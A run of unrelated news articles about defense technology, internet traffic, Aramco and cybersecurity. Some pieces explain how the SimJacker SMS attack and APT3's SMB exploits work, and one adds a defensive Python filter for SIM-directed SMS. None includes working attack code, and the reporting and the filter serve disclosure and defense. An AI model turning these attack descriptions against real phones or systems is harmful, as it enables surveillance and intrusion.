Stealthy no more? A German radar vendor says it tracked the F-35 jet in 2018 — from a pony farm

COLOGNE, Germany — In the illustrious history of the F-35 fighter jet, add a pony farm outside Berlin as the place where one company claims the plane’s stealth cover was blown.

The story that follows is a snapshot in the cat-and-mouse game between combat aircraft — designed to be undetectable by radar — and sensor makers seeking to undo that advantage. In the case of the F-35, the promise of invisibility to radar is so pronounced that it has colored much of the jet’s employment doctrine, lending an air of invincibility to the weapon: The enemy never saw it coming.

But technology leaps only last so long, and Russia and China are known to be working on technology aimed at nixing whatever leg up NATO countries have tried to build for themselves.

Now, German radar-maker Hensoldt claims to have tracked two F-35s for 150 kilometers following the 2018 Berlin Air Show in Germany in late April of that year. The company’s passive radar system, named TwInvis, is but one of an emerging generation of sensors and processors so sensitive and powerful that it promises to find previously undetectable activities in a given airspace.

What happened in Berlin was the rare chance to subject the aircraft — stealthy design features, special coating and all — to a real-life trial to see if the promise of low observability still holds true.

Stories about the F-35-vs.-TwInvis matchup had been swirling in the media since Hensoldt set up shop on the tarmac at Berlin’s Schönefeld Airport, its sensor calibrated to track all flying demonstrations by the various aircraft on the flight line. Media reports had billed the system, which comes packed into a van or SUV and boasts a collapsible antenna, as a potential game changer in aerial defense.

Air situation picture provided by Hensoldt’s passive radar tracking system, which covers the airspace of southern Germany. (Hensoldt)

At the same time, F-35 manufacturer Lockheed Martin was still in the race to replace the German Tornado fleet, a strategically important opportunity to sell F-35s to a key European Union member state. The company set up a sizable chalet at the air show, bringing brochures and hats depicting the aircraft together with a German flag.

Showtime in Schönefeld

The most convincing pieces of marketing for Hensoldt were meant to be two F-35s flown in from Luke Air Force Base, Arizona. The trans-Atlantic journey marked the jets’ longest nonstop flight, at 11-plus hours, officials said at the time.

But Lockheed and the U.S. Air Force did not fly the jets during the show, so Hensoldt’s engineers — and anyone walking by the company’s booth, for that matter — never got to see whether the aircraft would produce a radar track on a big screen like the other aircraft did.

Reporters never got a straight answer on why the F-35s stayed on the ground. One explanation was that there was no approved aerial demonstration program for the aircraft that would fit the Berlin show’s airspace limitations.

Regardless of the reason, with no flight by the F-35, companies could not try out their technologies on perhaps the most illustrious of test cases. Passive radar equipment computes an aerial picture by reading how civilian communications signals bounce off airborne objects. The technique works with any type of signal present in airspace, including radio or television broadcasts as well as emissions from mobile phone stations. The technology can be effective against stealthy aircraft designs, which are meant to break and absorb signals from traditional radar emitters so that nothing reflects back to ground-station sensors, effectively leaving defensive-radar operators in the dark.

Because there are no emitters, passive radar is covert, meaning pilots entering a monitored area are unaware they are being tracked.

There are limitations to the technology. For one, it depends on the existence of radio signals, which may not be a given in remote areas of the globe. In addition, the technology is not yet accurate enough to guide missiles, though it could be used to send infrared-homing weapons close to a target.

Hensoldt said various radio station broadcasts in the area, especially a bunch of strong Polish FM emitters broadcasting deep into Germany, improved TwInvis calibration during the Berlin show. The border is about 70 kilometers away from Schönefeld Airport.

During a system demonstration by Hensoldt at the exhibit, company engineers convened around a large TwInvis screen showing the track of a Eurofighter performing a thundering aerial show nearby. But the prized target of opportunity, the two F-35s, remained sitting on the tarmac.

Horse country

As the event ended, Hensoldt kept a close eye on any movement of the heavily guarded F-35s on the airfield. As exhibitors began to clear out, it looked like the chance of catching the planes during their inevitable departure back home would be lost.

But in Hensoldt’s telling, someone had the idea of setting up TwInvis outside the airport, which ended up being at a nearby horse farm.

Camped out amid equines, engineers got word from the Schönefeld tower about when the F-35s were slated to take off. Once the planes were airborne, the company says it started tracking them and collecting data, using signals from the planes’ ADS-B transponders to correlate the passive sensor readings.

See American F-35 fighter jets arrive in Germany from Luke Air Force Base, Arizona, for an appearance at the 2018 Berlin Air Show. This was the aircraft’s first appearance at the show.

A spokeswoman for the F-35 Joint Program Office said she was unable to comment by press time on Hensoldt’s claim of having tracked the aircraft in Berlin or about the plane’s general vulnerability to passive radar.

There are several horse and pony farms in the vicinity of Schönefeld Airport, offering everything from riding lessons to horse-themed summer camps for kids. A woman answering the phone at the business closest to the airfield, “Keidel Ranch,” a couple kilometers to the west, confirmed to Defense News that “someone” from the Berlin Air Show had showed up and stayed for “two or three days.”

Hensoldt previously said its passive-radar detection works regardless of whether the targeted aircraft has radar reflectors (so-called Luneburg lenses) installed. Those features — little knobs on the roots of the F-35 wings — can be seen in photos released by the U.S. Defense Department on the occasion of the journey to Berlin.

The reflectors are often mounted on the stealthy aircraft to make them visible to local air traffic authorities during friendly missions, like air show appearances. They artificially create a radar cross section in the frequency bands in which airspace-deconfliction radars operate so that traditional, defense radar systems know what they are dealing with.

According to a source close to the program, Luneburg lenses mounted on the departing F-35s would make it a certainty that the jets can be tracked, suggesting that the situation would be different without the reflectors installed.

“When the F-35 is not flying operational missions that require stealth — for example, at air shows, ferry flights or training — they ensure air traffic controllers and others are able to track their flight to manage air space safety,” Lockheed spokesman Michael Friedman wrote in a statement to Defense News. “The Air Force can best address questions related to their F-35s’ participation at the Berlin Air Show.”

Hensoldt argues that passive-radar detection works in a different spectrum, making the presence (or absence) of reflectors irrelevant. In layman’s terms, passive radar tracks the entire physical shape of planes, versus being triggered by smaller, angular features on the body of a jet.

Talking stealth

Whatever Hensoldt’s claims, the German military has embraced passive radar as an emerging technology key for future capabilities, including air defense. Earlier this year, the country’s Air Force was in the process of creating a formal acquisition track for passive sensing, Defense News reported.

Airman 1st Class Emily Greaves, 33rd Maintenance Squadron nondestructive inspection apprentice, uses a transducer to check for cracks in the low-observable paint on an F-35A. The transducer picks up clear sound vibrations to identify cracks that would diminish the stealth capability of the aircraft. (Senior Airman Andrea Posey/U.S. Air Force)

That step came after the Defence Ministry sponsored a weeklong “measuring campaign” in southern Germany last fall aimed at visualizing the entire region’s air traffic through TwInvis.

Also noteworthy, in the year and a half that followed the air show, emphasis on stealth features for the Franco-German-Spanish Future Combat Air System program, meant to be Europe’s next-generation warplane, shifted.

Officials from the industry teams involved in the program increasingly converged around the idea that stealth as we know it had lost its shine, this following rumors circling the German defense scene about how Hensoldt had apparently managed to light up the American aircraft on the radar screen.

Valerie Insinna in Washington contributed to this report.

Apple update causes data record: 7.1 terabits per second

The release of the iPhone operating system iOS 13 on Thursday evening apparently led to a data record at DE-CIX in Frankfurt am Main, the world's largest internet exchange. At times more than 7.1 terabits per second flowed through the lines. That corresponds to more than 2.1 million updates per hour.

How Apple pulverized the world data record

Insight. The new iPhone operating system iOS 13 has been available for a few days. At the world's largest internet exchange in Frankfurt, the download rush was bigger than ever: 7.1 terabits per second.

On Thursday evening Apple released its new smartphone operating system iOS 13, and in doing so promptly caused a new world data record at the world's largest internet exchange, which is operated in Frankfurt am Main. Most iPhones were able to download the installation file from 7 p.m. German time.

Anyone who was already using the previously current operating system, iOS 12.4, had to copy an installation file of about 2.2 gigabytes from the US tech group's servers for the update. Evidently so many Apple customers downloaded the new version immediately after release that internet backbones worldwide were loaded significantly more heavily than usual.

DE-CIX in Frankfurt, the world's largest internet exchange, promptly reported a new world record for data volume transferred per second: around 9 p.m. on Thursday, more than 7.1 terabits per second flowed through the lines. With that, DE-CIX's equipment clearly surpassed its own record mark of 6.8 terabits per second from December 2017.

"More than 2.1 million iPhones updated per hour"

"We assume that the release of the new Apple operating system iOS 13 caused this surge," DE-CIX CEO Harald Summa commented on the record when asked by WELT. "With a data stream of seven terabits per second, more than 2.1 million iPhones per hour could be updated to the new operating system." The performance curve published by DE-CIX clearly shows how the transfer rate jumped from a good six to over seven terabits per second from 7 p.m.

Apple can regularly boast that the latest version of iOS is installed very quickly on a high percentage of customer devices. At the end of August, for example, 88 percent were using the then-current operating system, iOS 12. Google's Android users, by contrast, often have to wait a long time for updates from their smartphone manufacturers. Many devices in the Android universe no longer receive new software at all. At the beginning of June, just over ten percent of all Android devices were running the current Android version 9.

Apple, by contrast, has in the past repeatedly had trouble providing enough download capacity in the face of the customer rush. This year, the statistics show, that worked better. But with a view to optimal load distribution on the internet, the company chose an awkward moment for releasing its update, because internet infrastructure regularly records a load peak around 9 p.m., when the USA as well as Europe and parts of the Middle East and Asia are all intensively online at the same time.

Data throughput in Frankfurt has doubled since 2014

DE-CIX is currently the world's largest international internet exchange point. These exchange points are comparable to centrally located airports: anyone who wants to get from Dubai to San Francisco can do so via hubs like the one in Frankfurt. More than 60 percent of the internet traffic at the Frankfurt exchange is of international origin.

DE-CIX is a world-leading operator of internet exchanges. Put into operation in 1995, the company manages 18 internet exchanges globally in Europe, India, the Middle East and the USA, all of which are interconnected. The Frankfurt site plays a key role. At the exchanges, large internet providers, international network operators such as Cloudflare and internet companies such as Google, Amazon or Facebook interconnect their networks to exchange data.

"The data throughput at DE-CIX in Frankfurt has far more than doubled since 2014 and will continue to develop rapidly in the future," Summa explains. "In 2018 alone, connected customer capacity rose by more than 35 percent year on year to more than 45 terabits."

This article first appeared at

US Army Seeks Blockchain Experts Who Can Trace Bitcoin in Real-Time

The United States Army Contracting Command (ACC) of New Jersey has issued a pre-solicitation notice for cryptocurrency investigation service providers. 

As a pre-solicitation, posted on July 25, the notice and the ACC’s responses do not bind ACC to solicit or award a contract.

For use in criminal investigations

According to the ACC, the cryptocurrency analytics solution is being sought for use by the U.S. Army Criminal Investigation Command (USACIDC) for use in criminal investigations and other missions.

The notice outlines that the contractor must provide a cloud-based, online service — not reliant on hardware or software — that can assist law enforcement in identifying and pursuing actors using cryptocurrencies for illicit purposes such as fraud, extortion and money laundering.

The contractor should provide the source of the cryptocurrency transactions, with the capacity to offer multi-cryptocurrency analysis from Bitcoin (BTC) to other major cryptocurrencies. 

Other requirements include providing “real-time Bitcoin and other cryptocurrency transaction tracing,” including service attribution and identification, as well as being able to identify transaction patterns and interactions with other entities.

Government and army alike turn to blockchain

In fall 2018, a Diar report had revealed that U.S. government agencies had tripled their investment in blockchain intelligence firms that year.

The vast majority of 2018 blockchain intelligence government deals were reportedly contracted to New York-based blockchain analytics firm Chainalysis, which had — as of that date — signed deals with government agencies totaling $5.3 million.

This August, Cointelegraph reported that the U.S. Air Force had secured new contracts with smart contract startup Simba Chain and blockchain data management firm Constellation, with a focus on using the technology for supply chain and data management.

Meanwhile, in an interview earlier this month Grammy award-winning music artist and Bitcoin advocate Akon quipped that the value of fiat currencies such as the U.S. dollar is ultimately only sustained by military might.


ARAMCO: 500 billion dollars lost in one night

Person of the week: Amin Nasser, CEO of Aramco

The missile attack on oil facilities does not hit Saudi Arabia only militarily. The economic damage is greater than suspected, because the oil company Aramco is about to go public. Now the most valuable company in the world is suddenly worth drastically less.

Amin Nasser is the CEO of Saudi Aramco. The 61-year-old engineer, a quiet man with rimless glasses, runs the world's largest oil company, with 76,000 employees. In a few weeks he wants to take it public. The international financial markets are already waiting eagerly, because Aramco is supposed to be the largest IPO in human history. In Riyadh they hope for a gigantic market valuation of more than two trillion dollars. For comparison: Lufthansa is worth seven billion. Aramco is thus supposed to be worth as much as 300 Lufthansa groups combined.

Now the drone attacks, whether they came from Yemeni Houthi rebels or from other Iranian proxy forces, have hit Saudi Arabia painfully not just militarily and politically. Above all, the economic damage is enormous, because Aramco's valuation has abruptly and dramatically sagged. "From now on, global investors see the special risks at Aramco as far greater than before. The assets are therefore being massively downgraded," say petroleum analysts in London.

Even if oil production should quickly return to normal, the long-term value of the company will be completely reassessed: "One recognizes Aramco's vulnerability. Nobody now sees the company as worth more than 1.5 trillion dollars in the long term."

Thus the missile attack has cost Saudi Arabia at least 500 billion dollars in a single night.

An initial listing of the company was already planned for the beginning of November. The newly installed Saudi energy minister, Prince Abdulaziz bin Salman, trumpeted just last week that the kingdom was aiming for Aramco's IPO "as quickly as possible." The plan was to bring the first shares (it was to start with one percent) to the domestic stock exchange first and then, in 2020, to an international trading venue, probably London. Now this timetable is wobbling.

Far more profitable than Apple

The sale of Aramco shares is the prestige project of Crown Prince Mohammed bin Salman. He wanted to invest the sale proceeds in new industries in order to diversify the Saudi economy beyond oil revenues. His plan called for placing five percent of the Aramco shares first and raising 100 billion dollars with it. That will now come to nothing.

Among analysts and bankers there will henceforth be dispute about what Aramco might be worth under the new circumstances. The Saudi agents are spreading the argument that the world's most profitable company in truth suffers no appreciable damage and is bursting with earning power. Indeed, a look at the half-year figures (the company, hitherto so strictly secretive, has recently begun publishing its balance-sheet figures for the IPO) shows that Aramco generated an incredible pre-tax profit of 92.5 billion dollars and revenue of 163.9 billion dollars in the first half of 2019.

That means: Aramco makes 500 million dollars in profit every day. Every day the company produces ten million barrels, three times as much as the oil company ExxonMobil. In dividends alone, Aramco paid out 46.6 billion dollars in the first half of the year. So far Apple has been considered the most profitable company in the world, but Aramco simply earns three times as much as the American computer group.

Danger from Western climate policy

For comparison: the best-known oil companies in the world (Chevron and Exxon Mobil from the USA, BP from Great Britain, the British-Dutch company Royal Dutch Shell and Total from France) achieved just under 80 billion dollars in profit in 2018, but only added together. Considering Aramco's enormous earning power and its huge crude oil reserves, a stock market valuation of well over 1.5 trillion would still be justified.

The skeptics, however, argue that the latest attack shows how vulnerable the company is. Should the conflict between Saudi Arabia and Iran widen, Aramco would suffer immediate damage. At the same time, the Saudi company would be the world's biggest loser if the Western world actually decarbonized in the course of a new climate policy, organized its energy supply without oil and replaced combustion engines with electric motors.

Amin Nasser reminds investors that the company will soon no longer be a pure oil company. It recently acquired a majority stake in the Saudi chemical group Sabic for a good 69 billion US dollars (61.1 billion euros). Sabic makes plastics, metals and fertilizers and, with a 25 percent stake, is also a major shareholder in the Swiss specialty chemicals group Clariant. Nasser is therefore betting on chemicals in the "downstream segment" and announces: "We are expanding our trading business and intensifying our innovation activities through pioneering initiatives such as the production of raw materials and chemicals, non-metallic materials and hydrogen fuels." But diversification will be of no use if the company's own large refineries are bombed out and oil could become a phase-out model in the long term. Either way: after the first attack, 500 billion are gone for now.

1 Billion Mobile Users Vulnerable to Ongoing ‘SimJacker’ Surveillance Attack

More than one billion mobile users are at risk from a SIM card flaw being currently exploited by threat actors, researchers warn.

A vulnerability discovered in mobile SIM cards is being actively exploited to track phone owners’ locations, intercept calls and more – all merely by sending an SMS message to victims, researchers say.

Researchers on Thursday disclosed what they said is a widespread, ongoing exploit of a SIM card-based vulnerability, dubbed “SimJacker.” The glitch has been exploited for the past two years by “a specific private company that works with governments to monitor individuals,” and impacts several mobile operators – with the potential to impact over a billion mobile phone users globally, according to researchers with AdaptiveMobile Security.

“Simjacker has been further exploited to perform many other types of attacks against individuals and mobile operators such as fraud, scam calls, information leakage, denial of service and espionage,” said researchers with AdaptiveMobile Security in a post breaking down the attack, released Thursday.

They said they “observed the hackers vary their attacks, testing many of these further exploits. In theory, all makes and models of mobile phone are open to attack as the vulnerability is linked to a technology embedded on SIM cards.”

The attack stems from a technology in SIM cards called S@T Browser (short for SIMalliance Toolbox Browser). This technology, which is typically used for browsing through the SIM card, can be used for an array of functions such as opening browsers on the phone as well as other functions like setting up calls, playing ring tones and more.

From a high level, threat actors can send messages to victims that use the S@T Browser functionality in order to trigger proactive commands that are sent to the handset. The issue is that impacted SIM cards containing the S@T Browser technology do not check the origin of messages that use the S@T Browser, and also that SIMs allow data download via SMS, researchers said.

These messages contain a series of SIM Toolkit (STK) instructions and are specifically crafted to be passed on to the SIM card within the device. Once the SMS is received by the SIM card, it uses the S@T Browser library as an execution environment, where it can trigger logic on the handset – mainly for requesting location and specific device information (IMEI).

The responses to these commands are sent back from the handset to the SIM card, where they are stored temporarily. Once the relevant information is retrieved from the handset, another proactive command is sent to the victim’s handset to send an SMS out with the information to the attacker’s handset.

“The location information of thousands of devices was obtained over time without the knowledge or consent of the targeted mobile phone users,” researchers said. “During the attack, the user is completely unaware that they received the attack, that information was retrieved, and that it was successfully exfiltrated. However the Simjacker attack can, and has been extended further to perform additional types of attacks.”

Once they have sent the message, attackers can launch an array of attacks utilizing the S@T Browser, including: location tracking, fraud, denial of service, malware spreading and call interception. Using the attack bad actors can also launch commands like playing a ring tone, sending short messages, setting up calls, and more.

Researchers said that they have seen many of these potential attacks being tested and used by the attacker group. While they did not name the group, they said: “We can say with a high degree of certainty, that the source is a large professional surveillance company, with very sophisticated abilities in both signaling and handsets.”

To mitigate against the attack, users can “investigate if you have SIM cards with S@T Browser technology deployed in your network and if so whether any S@T Browser-specific proprietary security mechanisms can be applied,” researchers said.

Other recommendations include:

  • Determine whether existing network equipment can be configured to filter binary SMS messages from unauthorised sources.
  • Consider if current firewalls are simply only GSMA document ‘compliant’. “These GSMA documents should really only be used as a starting point for more effective protection,” according to researchers.
  • Review the ongoing investigation and research you are doing on what is being encountered in your network.
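The second recommendation above, filtering SIM-directed binary SMS from unauthorised sources, can be expressed as a simple policy check. The code below is an added illustration, not part of the researchers' post or any vendor product: it assumes messages arrive already decoded into TP-PID, TP-DCS and originator fields, uses the TP-PID value 0x7F and message class 2 that 3GPP TS 23.040 / TS 31.111 define for SIM data download, and treats a constructed allowlist as the operator's own OTA gateways.

```python
"""Heuristic filter for SIM-directed binary SMS (SIM data download).

Assumptions (constructed for this example):
  * each message is a dict decoded from the SMS PDU with the keys
    "originator", "tp_pid" and "tp_dcs";
  * TP-PID 0x7F marks "(U)SIM data download" and message class 2 marks a
    SIM-specific message (3GPP TS 23.040 / TS 31.111);
  * TRUSTED_OTA_ORIGINATORS is the operator's own OTA gateway allowlist.
"""
from typing import Optional

SIM_DATA_DOWNLOAD_PID = 0x7F   # TP-PID: (U)SIM data download
SIM_SPECIFIC_CLASS = 2         # message class 2: SIM-specific message

# Constructed allowlist; a real deployment would load the operator's gateways.
TRUSTED_OTA_ORIGINATORS = {"+491700000001", "OTA-GW-EXAMPLE"}


def message_class(dcs: int) -> Optional[int]:
    """Return the message class (0-3) carried in TP-DCS, or None if absent.

    Two DCS coding groups carry a class: the general group (0x00-0x3F) when
    bit 4 is set, and the "data coding / message class" group (0xF0-0xFF).
    """
    group = dcs & 0xF0
    if group <= 0x30:                       # general data coding indication
        return dcs & 0x03 if dcs & 0x10 else None
    if group == 0xF0:                       # data coding / message class group
        return dcs & 0x03
    return None


def targets_sim(msg: dict) -> bool:
    """True if the SMS is addressed to the SIM rather than to the user."""
    return (msg["tp_pid"] == SIM_DATA_DOWNLOAD_PID
            or message_class(msg["tp_dcs"]) == SIM_SPECIFIC_CLASS)


def classify(msg: dict) -> str:
    """Decide what to do with one message: 'deliver' or 'block'."""
    if not targets_sim(msg):
        return "deliver"                    # ordinary text for the user
    if msg["originator"] in TRUSTED_OTA_ORIGINATORS:
        return "deliver"                    # operator's own OTA traffic
    # SIM-directed binary SMS from an unknown originator: the traffic class
    # the S@T Browser abuse relies on. Block it and keep it for analysis.
    return "block"


def filter_messages(messages):
    """Apply classify() to a batch and return (decision, originator) pairs."""
    return [(classify(m), m["originator"]) for m in messages]


# Constructed sample traffic; no real subscribers or gateways.
SAMPLE_MESSAGES = [
    {"originator": "+447700900123", "tp_pid": 0x00, "tp_dcs": 0x00},  # plain text
    {"originator": "OTA-GW-EXAMPLE", "tp_pid": 0x7F, "tp_dcs": 0xF6},  # own OTA
    {"originator": "+12025550147", "tp_pid": 0x7F, "tp_dcs": 0xF6},   # unknown, PID
    {"originator": "+12025550147", "tp_pid": 0x00, "tp_dcs": 0x16},   # unknown, class 2
]

if __name__ == "__main__":
    for decision, origin in filter_messages(SAMPLE_MESSAGES):
        print(f"{decision:8s} {origin}")
```

An originator allowlist alone is weak, since SMS originator addresses can be spoofed at the interconnect; the check is a starting point to be combined with the SMS firewall and GSMA guidance the post refers to.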

Researchers said that they have submitted the details of the exploit to the GSMA in terms of vulnerability disclosure, and “will continue to research how the attacks function, look for other variants of the Simjacker exploits and use of the vulnerability.”

While researchers say that the S@T protocol is used by mobile operators in at least 30 countries whose population adds up to over a billion people, in an email to Threatpost, the GSMA [stated] that the “potential vulnerability” impacts a “small minority of SIM cards.”

“This research specifically considers SIM cards which make use of a technology not used by most mobile operators, and requires a user to be sent specially coded messages containing commands for the SIM card,” a GSMA spokesperson told Threatpost. “The potential vulnerability is understood to not be widespread and mitigations have been developed for affected mobile networks to implement.”

Moving forward, “the GSMA has worked with the researchers and the mobile industry to create guidance for its members about how to identify which SIMs are impacted and ways to block these malicious messages, and has been working with the impacted member operators to help implement these mitigations,” the GSMA spokesperson told Threatpost.

Further findings from the exploit will be presented at Virus Bulletin 2019 in October.

China’s APT3 Pilfers Cyberweapons from the NSA

Large portions of APT3’s remote code-execution package were likely reverse-engineered from prior attack artifacts.

The advanced persistent threat (APT) group known as APT3, which researchers across the board link to the Chinese government, has built a full in-house battery of exploits and cybertools collectively dubbed “UPSynergy.” An analysis of the toolkit has uncovered a geopolitical cat-and-mouse spy game: It turns out that many parts of the package are likely gleaned from watching attacks by the National Security Agency’s Equation Group APT on target networks where APT3 also has a presence.

Prior research from Symantec shows that APT3 was able to acquire a variant of the NSA-developed cyberweapon known as EternalRomance – prior to the Shadow Brokers leak of the spy agency’s arsenal in 2017. It has been a bit of a mystery as to how APT3 accomplished that – but research from Check Point offers a hypothesis.

“The threat group known as APT3 recreated its own version of an Equation group exploit using captured network traffic,” according to the analysis, published Thursday. “We believe that this artifact was collected during an attack conducted by the NSA Equation Group against a network monitored by APT3, allowing it to enhance its exploit arsenal with a fraction of the resources required to build the original tool…One possible modus operandi – the Chinese collect attack tools used against them, reverse-engineer and reconstruct them to create equally strong digital weapons.”

APT3 (a.k.a Buckeye or UPS Team) from there went on to equip the reverse-engineered attack tool, named Bemstour, with an additional zero-day, researchers said. Bemstour is used by APT3 to gain remote code-execution on a victim’s machine; the enhancement consists of a new exploit that allows APT3 to cast a wider net in terms of victimology.

“EternalRomance targeted mostly Windows 7 systems (as well as lower versions of Windows NT where SMBv1 is located),” Check Point explained. “One of the problems in adapting EternalRomance to higher Windows versions was a patch introduced in Windows 8 which eliminated the possibility to use an information leak vulnerability leveraged by it.”

The NSA got around this by chaining EternalRomance to a different tool that exploited Windows 8, called EternalChampion, to create a hybrid exploit named EternalSynergy. APT3 instead found a whole new zero-day information leak exploit to bolt onto its EternalRomance variant, which allowed the group to upgrade their version to be effective against OS higher than Windows 7.

“All of this activity suggests that the group was not exposed to an actual NSA exploitation tool, as they would then not need to create another zero-day exploit,” according to the analysis. “We decided to name APT3’s bundle of exploits UPSynergy, since, much like in the case of Equation group, it combines two different exploits to expand the support to newer operating systems.”

Interestingly, the goal of the weapon is to deploy a payload on the victim’s machine which is injected to a running process using an implant, which bears striking resemblance to the Equation group’s DoublePulsar tool.

“As far as APT3’s implant is concerned, it seems likely that the DoublePulsar code was reused as is,” Check Point researchers noted. “The code is not executed directly, but has several layers of obfuscation. Essentially, the Equation Group’s DoublePulsar code is wrapped with an APT3 position independent crypter and loader.”

In all, the research shows a cyberspy drama played out between the United States and Beijing.

“If network traffic was indeed used by the group as a reference, the traffic was likely collected from a machine controlled by APT3,” Check Point researchers pointed out. “This means either a Chinese machine that was targeted by the NSA and monitored by the group, or a machine compromised by the group beforehand on which foreign activity was noticed. We believe the former is more likely, and in that case could be made possible by capturing lateral movement within a victim network targeted by the Equation Group.”

Along with spying on each other, the U.S. and China are apparently in the midst of a cyber-arms race to develop new exploits.

“Finding a zero-day info leak, recreating the exploit based on the aforementioned vulnerability, and utilizing a lot of internal undocumented structures of SMB in the implants, implies that there was a similar expertise with and analysis performed on SMB drivers (with an eye to exploiting them) on the Chinese side, roughly at the same time it was widely used by the NSA,” according to the analysis.

The zero-day that APT3 found (CVE-2019-0703) is “an information disclosure vulnerability [that] exists in the way […] the Windows SMB Server handles certain requests,” according to Microsoft. However, the flaw is actually a logic bug related to querying information from the Windows Named Pipes mechanism, according to Check Point, and not a vulnerability in the SMB protocol or its implementation.

“While it can be triggered using SMB, there are other ways to leverage it, e.g. using the NtQueryInformationFile Windows API call that is unrelated to SMB,” the researchers said. “The bug resides within npfs.sys (Name Pipe File System driver) in a function named NpQueryInternalInfo. The latter is used to query named pipes and return a value called a file reference number….[the number] is a pointer to a kernel structure named CCB (Client Control Block). This is an undocumented struct defined in npfs.sys, which has a partial definition (named NP_CCB) provided by the ReactOS project. Clearly, this is not the intended value to be returned in this case, and the leak of this struct discloses useful information that can be leveraged by attackers.”

In APT3’s case, the group triggered the vulnerability by connecting over SMB to a named pipe on the victim’s machine.

“The method was used to determine the bitness of the attacked operating system and overwrite (using a write primitive) a field in the leaked structure, which eventually provided the group with remote code-execution,” according to Check Point.

Meanwhile, the original vulnerability (CVE-2017-0143) targeted by EternalRomance and repurposed by APT3 is rooted in a type confusion bug; as a result of type confusion between SMB messages, the server considers an unrelated SMB message as part of an SMB Transaction of a different type, and activates the wrong type of SMB handler.

“This handler in turn shifts the Transaction struct’s pointer to the incoming data buffer by the amount of data received in the SMB message,” said the researchers. “Because the pointer value was shifted by the wrong handler, data of further SMB messages (which are treated by the correct type of handler) can be potentially written outside the boundaries of the incoming data buffer. If there was successful grooming (i.e. the heap was correctly shaped beforehand), this out-of-bound write may allow us to overwrite an adjacent SMB Transaction structure.”

In all, the research shows two highly sophisticated nation-state actors jockeying for cyber-dominance with exploit developments and tool espionage.

“It’s not always clear how threat actors achieve their exploitation tools, and it’s commonly assumed that actors can conduct their own research and development or get it from a third party,” Check Point concluded. “In this case we have evidence to show that a third (but less common) scenario took place – one where attack artifacts of a rival (i.e. Equation Group) were used as the basis and inspiration for establishing in-house offensive capabilities by APT3.”

How the US Military and Companies Are Courting Hackers

Patrick Kiley of the IT security firm Rapid7

The US Air Force hauled an F-35 simulator to DEF CON; BMW gave a talk together with Chinese security researchers at Black Hat. Other organizations and companies were still keeping their distance.

“Hi, I’m Will. I work for the US Air Force.” The bespectacled man in the 1980s Star Wars T-shirt stood amid a crowd of hackers in the “Aviation Village”, set up for the first time at the DEF CON hacker conference, and explained the flight simulator assembled behind him. “Our pilots use this simulator to get ready for missions in the F-35, our most modern fighter jet.” The F-35, and of course the simulator, relies on large amounts of program code that needs to be secured.

What was remarkable about this appearance was not just the effort the US Air Force put into setting up the simulator. It was also that “Will” is, by his full name, Dr. Will Roper, who as Assistant Secretary for Acquisition, Technology and Logistics is responsible for all of the US Air Force’s procurement. And that he therefore commands a budget of around 40 billion US dollars. Every year.

Typically, then, suppliers court Roper’s favor. At DEF CON, held for the 27th time this year, it was the other way around: the military was courting the attention of hackers. In conversation with c’t, Roper explained why he supports the Aviation Village together with the US Department of Homeland Security, a European airline and other companies: “Of course we have hackers in our ranks too. But not enough, and probably not the best talents in their respective fields.” It is the software, he said, that makes the F-35 so superior. And if one were to bury one’s head in the sand on the subject of software security, something would be going “very, very wrong”. That is why the Air Force and civil aviation organizations want to grant talented hackers access to the relevant avionics as part of IT security events.

Consistently with this, the US Department of Defense also organized, in parallel with DEF CON in a neighboring hotel, a live hacking competition whose aim was to uncover security vulnerabilities in the 20,000 US dollar Trusted Aircraft Information Download Station (TADS) of the F-15 fighter jet. According to the US Air Force, TADS collects and processes data from cameras and other sensors used in the jet during flight.

“Hack our city”: in the ICS Village, DEF CON visitors could try to hijack a simulated, networked smart city.

Hackers who took part in the competition complained afterwards that they had had too little time to familiarize themselves with components that were completely foreign to them. For most of them, avionics is uncharted territory. All the more remarkable that in less than two days, partly using screwdrivers, pliers and alligator clips, they were able to find various bugs in TADS. Patrick Kiley of the IT security firm Rapid7 (see lead image) took the opportunity to discover some nasty bugs in the onboard systems of small aircraft, which among other things made it possible to switch off their autopilot. Other bugs discovered could even have caused system failures.

The representatives of the aviation industry who could be met in the Aviation Village still see a long way to go before smooth cooperation is achieved. The heavily regulated industry, shaped by countless standards and certifications, is still wary of contact with hackers, who typically work unconventionally. And the hackers, for their part, first have to feel their way into those very standards and the technologies that have so far been strictly shielded from their eyes.

The automotive industry is already a step ahead. Tesla was already a supporter of the first “Car Hacking Village” at DEF CON in 2015, and last year company founder Elon Musk did not pass up the chance to give a talk at the conference. His company’s bug bounty program pays up to 15,000 US dollars per vulnerability.

The grand prize of this year’s Capture the Flag (CTF) competition in the Car Hacking Village was a Tesla Model S, but the manufacturer did not appear as a sponsor. Understandably, since the winners of the competition were not allowed to take the otherwise brand-new car home without signs of use: the teams rolled dice for points during the contest. If a participant rolled a 3, for example, he was allowed to hit the car with a hammer. A 6 meant the chance to drop a bowling ball onto the hood.

Why? The CTF organizers explained it like this: “If you have the chance to do something you would otherwise never do, you have to take it.” This statement evidently referred both to the chance to hack the Tesla and to the chance to demolish it, decorate it with countless stickers or cover it with lipstick marks. The winner ultimately received the keys to what the organizers called a “unique vehicle with patina and history”, and the competition was guaranteed the attention of visitors and the press.

BMW presented itself without a car in tow, but with hackers on stage. The carmaker evidently has no reservations when it comes to contacts with the hacker community: BMW representatives gave a talk at Black Hat together with security experts from Tencent Keen Labs. It dealt with vulnerabilities, some of them remotely exploitable, in BMW’s “ConnectedDrive” software that Tencent discovered in 2018. The Chinese company subsequently helped BMW fix them.

There was also bug bounty news during Black Hat and DEF CON: Apple now pays bug finders up to one million US dollars for security vulnerabilities that allow remote execution of kernel code without user interaction and additionally survive a reboot of the vulnerable system.

Microsoft used Black Hat to announce news about its bug bounty programs: the Redmond company now pays up to 300,000 US dollars for vulnerability information affecting the Azure cloud platform. In the Azure Security Lab set up specifically for this purpose, hackers can attack the Azure infrastructure used in production without endangering live operations and thus customer data, online and independent of events such as Black Hat or DEF CON.

Of all companies, it was aircraft manufacturer Boeing, which has been criticized for months over security flaws in its aircraft, that showed itself less open to cooperation. After security expert Ruben Santamarta alerted Boeing to numerous vulnerabilities and sloppily programmed passages in the firmware of an important network component of the 787 (“Dreamliner”) long-haul aircraft, the manufacturer did open a dialogue. In the end, however, it brushed Santamarta off with the comment that it could not reproduce the vulnerabilities, without giving him the opportunity to discuss his findings on site with its engineers.

The Chief Information Security Officer of a European airline told c’t that he found this behavior incomprehensible: “If someone reports a bug to me and I can’t reproduce it, then I do everything I can to be able to follow the researcher’s steps.”

